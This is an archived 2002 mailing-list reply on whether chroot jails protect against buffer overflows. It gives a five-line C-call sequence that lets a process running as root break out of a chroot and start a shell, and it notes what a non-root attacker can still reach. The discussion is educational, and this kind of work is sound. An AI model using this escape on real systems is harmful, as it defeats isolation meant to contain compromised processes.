Re: OT? Are chroots immune to buffer overflows?

From: Luciano Miguel Ferreira Rocha (strangeat_private-ip.org)
Date: Wed May 22 2002 - 10:24:05 PDT

  • Next message: Adam Lydick: "Re: OT? Are chroots immune to buffer overflows?" 

    On Wed, May 22, 2002 at 01:02:56PM +0200, SpaceWalker wrote:
> But If you are able to run code as root, a few syscalls are still available to you :
> inserting modules and ptrace().

If you're able to run code as root, all you need, in most Un*x systems,
is:
mkdir("blah");
chroot("blah");
chdir("../../../../../../");
chroot(".");
execl("/bin/bash", "bash", NULL);

On others Un*x systems, like some BSDs, an implicit chdir(".") is always
made after a chroot, so this doesn't work, but you can still do mknod(2),
mount(2), etc..

The point is if the chrooted program runs as root, almost anything can be
done.

If it doesn't, an attacker can only play with inherited file descriptors,
kill(2) and ptrace(2) to processes belonging to the same user, and
meddling with the accessible filesystem for private records or to aid in
an intrusion.

Regards

-- 
Luciano Rocha, strangeat_private

    This archive was generated by hypermail 2b30 : Thu May 23 2002 - 20:56:03 PDT